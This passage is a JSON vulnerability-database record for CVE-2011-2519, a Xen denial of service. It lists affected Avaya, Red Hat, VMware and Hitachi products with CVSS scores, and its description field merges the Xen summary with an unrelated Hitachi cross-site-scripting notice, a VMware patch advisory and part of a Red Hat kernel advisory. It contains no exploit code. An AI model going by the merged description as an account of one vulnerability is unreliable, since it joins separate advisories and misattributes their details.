        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2.2"
      },
      {
        "model": "hat enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "5"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "ip office application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2.1"
      },
      {
        "model": "aura communication manager utility services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "voice portal sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "ip office application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "aura application server sip core",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53002.0"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.1"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.1"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.1"
      },
      {
        "model": "communication server 1000e signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.5"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura messaging",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5.0"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.2"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xensource",
        "version": "3.0.3"
      },
      {
        "model": "aura system manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura system manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.2"
      },
      {
        "model": "communication server 1000m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.5"
      },
      {
        "model": "communication server 1000m signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "communication server 1000e signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "enterprise linux client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "communication server 1000e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "ip office application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "aura system manager sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "communication server 1000m signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.5"
      },
      {
        "model": "aura session manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.3"
      },
      {
        "model": "aura application server sip core",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53002.1"
      },
      {
        "model": "communication server 1000e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.5"
      },
      {
        "model": "communication server 1000m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "conferencing standard edition sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "jp1/it service level management manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "-09-50"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-50"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-11-02"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-11"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-10-03"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-10"
      },
      {
        "model": "jp1/it service level management-manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-51"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-50-02"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-11-05"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "49375"
      },
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-005252"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2519"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-518"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.3.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-2519"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Hitachi",
    "sources": [
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2011-2519",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "SINGLE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 5.5,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 5.1,
            "id": "CVE-2011-2519",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:A/AC:L/Au:S/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Adjacent Network",
            "authentication": "Single",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 5.2,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2011-2519",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:A/AC:M/Au:S/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2011-2519",
            "trust": 1.8,
            "value": "Medium"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201108-518",
            "trust": 0.6,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-005252"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2519"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-518"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Xen in the Linux kernel, when running a guest on a host without hardware assisted paging (HAP), allows guest users to cause a denial of service (invalid pointer dereference and hypervisor crash) via the SAHF instruction. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified. Xen is prone to a denial-of-service vulnerability. \nAttackers can exploit this issue to cause the host operating system to consume excessive amounts of resources, denying service to legitimate users. Hitachi JP1 products are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. \nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. \nThe following products are affected:\nJP1/IT Resource Management - Manager\nJP1/IT Service Level Management - Manager. \n\nCertain unspecified input is not properly sanitised before being\nreturned to the user. \n\nPROVIDED AND/OR DISCOVERED BY:\nReported by the vendor. \n\nThis update also fixes several bugs. Documentation for these bug fixes will\nbe available shortly from the Technical Notes document linked to in the\nReferences section. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n ----------------------------------------------------------------------\n                   VMware Security Advisory\n\nAdvisory ID: VMSA-2012-0001\nSynopsis:    VMware ESXi and ESX updates to third party library\n             and ESX Service Console\nIssue date:  2012-01-30\nUpdated on:  2012-01-30 (initial advisory)\n\nCVE numbers: --- COS Kernel ---\n             CVE-2011-0726, CVE-2011-1078, CVE-2011-1079,\n             CVE-2011-1080, CVE-2011-1093, CVE-2011-1163,\n             CVE-2011-1166, CVE-2011-1170, CVE-2011-1171,\n             CVE-2011-1172, CVE-2011-1494, CVE-2011-1495,\n             CVE-2011-1577, CVE-2011-1763, CVE-2010-4649,\n             CVE-2011-0695, CVE-2011-0711, CVE-2011-1044,\n             CVE-2011-1182, CVE-2011-1573, CVE-2011-1576,\n             CVE-2011-1593, CVE-2011-1745, CVE-2011-1746,\n             CVE-2011-1776, CVE-2011-1936, CVE-2011-2022,\n             CVE-2011-2213, CVE-2011-2492, CVE-2011-1780,\n             CVE-2011-2525, CVE-2011-2689, CVE-2011-2482,\n             CVE-2011-2491, CVE-2011-2495, CVE-2011-2517,\n             CVE-2011-2519, CVE-2011-2901\n             --- COS cURL ---\n             CVE-2011-2192\n             --- COS rpm ---\n             CVE-2010-2059, CVE-2011-3378\n             --- COS samba ---\n             CVE-2010-0547, CVE-2010-0787, CVE-2011-1678,\n             CVE-2011-2522, CVE-2011-2694\n             --- COS python ---\n             CVE-2009-3720, CVE-2010-3493, CVE-2011-1015,\n             CVE-2011-1521\n             --- python library ---\n             CVE-2009-3560, CVE-2009-3720, CVE-2010-1634,\n             CVE-2010-2089, CVE-2011-1521\n ----------------------------------------------------------------------\n\n1. Summary\n\n   VMware ESXi and ESX updates to third party library and ESX Service\n   Console address several security issues. \n\n2. Relevant releases\n\n   ESXi 4.1 without patch ESXi410-201201401-SG\n\n   ESX 4.1 without patches ESX410-201201401-SG, ESX410-201201402-SG,\n                           ESX410-201201404-SG, ESX410-201201405-SG,\n                           ESX410-201201406-SG, ESX410-201201407-SG\n\n3. Problem Description\n\n a. ESX third party update for Service Console kernel\n\n    The ESX Service Console Operating System (COS) kernel is updated to\n    kernel-2.6.18-274.3.1.el5 to fix multiple security issues in the\n    COS kernel. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n    assigned the names CVE-2011-0726, CVE-2011-1078, CVE-2011-1079,\n    CVE-2011-1080, CVE-2011-1093, CVE-2011-1163, CVE-2011-1166,\n    CVE-2011-1170, CVE-2011-1171, CVE-2011-1172, CVE-2011-1494,\n    CVE-2011-1495, CVE-2011-1577, CVE-2011-1763, CVE-2010-4649,\n    CVE-2011-0695, CVE-2011-0711, CVE-2011-1044, CVE-2011-1182,\n    CVE-2011-1573, CVE-2011-1576, CVE-2011-1593, CVE-2011-1745,\n    CVE-2011-1746, CVE-2011-1776, CVE-2011-1936, CVE-2011-2022,\n    CVE-2011-2213, CVE-2011-2492, CVE-2011-1780, CVE-2011-2525,\n    CVE-2011-2689, CVE-2011-2482, CVE-2011-2491, CVE-2011-2495,\n    CVE-2011-2517, CVE-2011-2519, CVE-2011-2901 to these issues. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201401-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n b. ESX third party update for Service Console cURL RPM\n\n    The ESX Service Console (COS) curl RPM is updated to cURL-7.15.5.9\n    resolving a security issues. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n    assigned the name CVE-2011-2192 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201402-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n c. ESX third party update for Service Console nspr and nss RPMs\n\n    The ESX Service Console (COS) nspr and nss RPMs are updated to\n    nspr-4.8.8-1.el5_7 and nss-3.12.10-4.el5_7 respectively resolving\n    a security issues. \n\n    A Certificate Authority (CA) issued fraudulent SSL certificates and\n    Netscape Portable Runtime (NSPR) and Network Security Services (NSS)\n    contain the built-in tokens of this fraudulent Certificate\n    Authority. This update renders all SSL certificates signed by the\n    fraudulent CA as untrusted for all uses. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201404-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n d. ESX third party update for Service Console rpm RPMs\n\n    The ESX Service Console Operating System (COS) rpm packages are\n    updated to popt-1.10.2.3-22.el5_7.2, rpm-4.4.2.3-22.el5_7.2,\n    rpm-libs-4.4.2.3-22.el5_7.2 and rpm-python-4.4.2.3-22.el5_7.2\n    which fixes multiple security issues. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n    assigned the names CVE-2010-2059 and CVE-2011-3378 to these issues. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201406-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n\n e. ESX third party update for Service Console samba RPMs\n\n    The ESX Service Console Operating System (COS) samba packages are\n    updated to samba-client-3.0.33-3.29.el5_7.4,\n    samba-common-3.0.33-3.29.el5_7.4 and\n    libsmbclient-3.0.33-3.29.el5_7.4 which fixes multiple security\n    issues in the Samba client. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n    assigned the names CVE-2010-0547, CVE-2010-0787, CVE-2011-1678,\n    CVE-2011-2522 and CVE-2011-2694 to these issues. \n\n    Note that ESX does not include the Samba Web Administration Tool\n    (SWAT) and therefore ESX COS is not affected by CVE-2011-2522 and\n    CVE-2011-2694. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201407-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n f. ESX third party update for Service Console python package\n\n    The ESX Service Console (COS) python package is updated to\n    2.4.3-44 which fixes multiple security issues. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n    assigned the names CVE-2009-3720, CVE-2010-3493, CVE-2011-1015 and\n    CVE-2011-1521 to these issues. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201405-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n g. ESXi update to third party component python\n\n    The python third party library is updated to python 2.5.6 which\n    fixes multiple security issues. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n    assigned the names CVE-2009-3560, CVE-2009-3720, CVE-2010-1634,\n    CVE-2010-2089, and CVE-2011-1521 to these issues. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           5.0       ESXi     patch pending\n    ESXi           4.1       ESXi     ESXi410-201201401-SG\n    ESXi           4.0       ESXi     patch pending\n    ESXi           3.5       ESXi     patch pending\n\n    ESX            4.1       ESX      not affected\n    ESX            4.0       ESX      not affected\n    ESX            3.5       ESX      not affected\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n\n4. Solution\n\n   Please review the patch/release notes for your product and version\n   and verify the checksum of your downloaded file. \n\n   VMware ESXi 4.1\n   ---------------\n   ESXi410-201201401\n   http://downloads.vmware.com/go/selfsupport-download\n   md5sum: BDF86F10A973346E26C9C2CD4C424E88    \n   sha1sum: CC0B92869A9AAE4F5E0E5B81BEE109BCD7DA780F\n   http://kb.vmware.com/kb/2009143\n   ESXi410-201201401 contains ESXi410-201201401-SG\n\n   VMware ESX 4.1\n   --------------\n   ESX410-201201001\n   http://downloads.vmware.com/go/selfsupport-download\n   md5sum: 16DF9ACD3E74BCABC2494BC23AD0927F    \n   sha1sum: 1066AE1436E1A75BA3D541AB65296CFB9AB7A5CC\n   http://kb.vmware.com/kb/2009142\n\n   ESX410-201201001 contains ESX410-201201401-SG, ESX410-201201402-SG,\n   ESX410-201201404-SG, ESX410-201201405-SG, ESX410-201201406-SG and\n   ESX410-201201407-SG\n\n5. References\n\n   CVE numbers\n\n   --- COS Kernel ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0726\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1078\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1079\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1080\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1093\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1163\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1166\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1170\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1171\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1172\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1494\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1495\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1577\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1763\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4649\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0695\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0711\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1044\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1182\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1573\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1576\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1593\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1745\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1746\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1776\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1936\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2022\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2213\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2492\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1780\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2525\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2689\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2482\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2491\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2495\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2517\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2519\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2901\n   --- COS cURL ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2192\n   --- COS rpm ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2059\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3378\n   --- COS samba ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0547\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0787\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1678\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2522\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2694\n   --- COS python ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3493\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1015\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1521\n   --- python library ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3560\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1634\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2089\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1521\n\n ----------------------------------------------------------------------\n\n6. Change log\n\n   2012-01-30 VMSA-2012-0001\n   Initial security advisory in conjunction with the release of patches\n   for ESX 4.1 and ESXi 4.1 on 2012-01-30. \n\n ----------------------------------------------------------------------\n\n7. Contact\n\nE-mail list for product security notifications and announcements:\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\nThis Security Advisory is posted to the following lists:\n\n  * security-announce at lists.vmware.com\n  * bugtraq at securityfocus.com\n  * full-disclosure at lists.grok.org.uk\n\nE-mail:  security at vmware.com\nPGP key at: http://kb.vmware.com/kb/1055\n\nVMware Security Advisories\nhttp://www.vmware.com/security/advisories\n\nVMware security response policy\nhttp://www.vmware.com/support/policies/security_response.html\n\nGeneral support life cycle policy\nhttp://www.vmware.com/support/policies/eos.html\n\nVMware Infrastructure support life cycle policy\nhttp://www.vmware.com/support/policies/eos_vi.html\n\nCopyright 2012 VMware Inc.  All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 9.8.3 (Build 4028)\nCharset: utf-8\n\nwj8DBQFPJ5DIDEcm8Vbi9kMRAnzCAKCmaAoDp49d61Mr1emzh/U0N8vbgACdFZk8\nf2pLxi537s+ew4dvnYNWlJ8=\n=OAh4\n-----END PGP SIGNATURE-----\n. \n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. Relevant releases/architectures:\n\nRed Hat Enterprise Linux EUS (v. 5.6 server) - i386, ia64, noarch, ppc, s390x, x86_64\n\n3. Description:\n\nThese packages contain the Linux kernel. \n\nThis update fixes the following security issues:\n\n* A flaw in the Stream Control Transmission Protocol (SCTP) implementation\ncould allow a remote attacker to cause a denial of service by sending a\nspecially-crafted SCTP packet to a target system. (CVE-2011-2482,\nImportant)\n\nIf you do not run applications that use SCTP, you can prevent the sctp\nmodule from being loaded by adding the following to the end of the\n\"/etc/modprobe.d/blacklist.conf\" file:\n\nblacklist sctp\n\nThis way, the sctp module cannot be loaded accidentally, which may occur\nif an application that requires SCTP is started. A reboot is not necessary\nfor this change to take effect. \n\n* A flaw in the client-side NFS Lock Manager (NLM) implementation 